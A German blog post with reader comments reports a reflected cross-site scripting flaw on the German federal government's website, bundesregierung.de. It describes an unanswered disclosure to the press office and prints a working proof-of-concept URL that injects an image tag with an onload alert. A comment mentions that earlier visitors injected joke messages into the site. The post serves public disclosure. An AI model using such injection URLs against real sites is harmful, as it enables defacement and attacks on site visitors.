Am 11.07.2011 habe ich das Presse- und Informationsamt der Bundesregierung auf eine Sicherheitslücke auf www.bundesregierung.de aufmerksam gemacht. Die E-Mail ging an internetpost@bpa.bund.de (die stehen im Impressum) - bis heute gab es darauf keine Reaktion.
Bei der Sicherheitslücke handelt es sich um reflektives Cross-Site-Scripting, welches seit Jahren die Internet-Seuche Nummer 1 ist. Auch viele Seiten die unter *.bund.de laufen, sind voll mit XSS.
Hier der Link zum Ausprobieren mit Nyan Cat und Popup:
http://www.bundesregierung.de/dbbabbau/index.jsp?ft=%22%3E%3Cimg%20src=%22http://media.tumblr.com/tumblr_lm8zd9q4bW1qgiyy3.gif%22%20onload=alert%28%22xss%22%29%3E&sel_rg4=0&sel_at6=0&rg2=&sel_rg5=0&submit=%3E+suchenund in Kurzform zum Weitergeben und Verlinken:
http://goo.gl/PKdgJBundesregierung.de hatte auch schon öfter Probleme mit der Sicherheit. Das kann man hier, hier und hier nachlesen.
Du alter h4xx0r!
ReplyDeleteNyan Cat :)
ReplyDeletescheiß brd
ReplyDeleteBei Demo-Screenshots muss man kreativ sein. Ich baue da ganz gerne Rick Roll oder Trolololo ein. ;)
ReplyDeletehttp://www.einfach-fuchs.de/2011/forschung-sicherheit-offentlicher-web-anwendungen/
DIe Lücke ist seit Jahren bekannt. "Merkel tritt ab" usw. hat man damals spaßeshalber eingeschleust und sich zugesandt. ;-)
ReplyDelete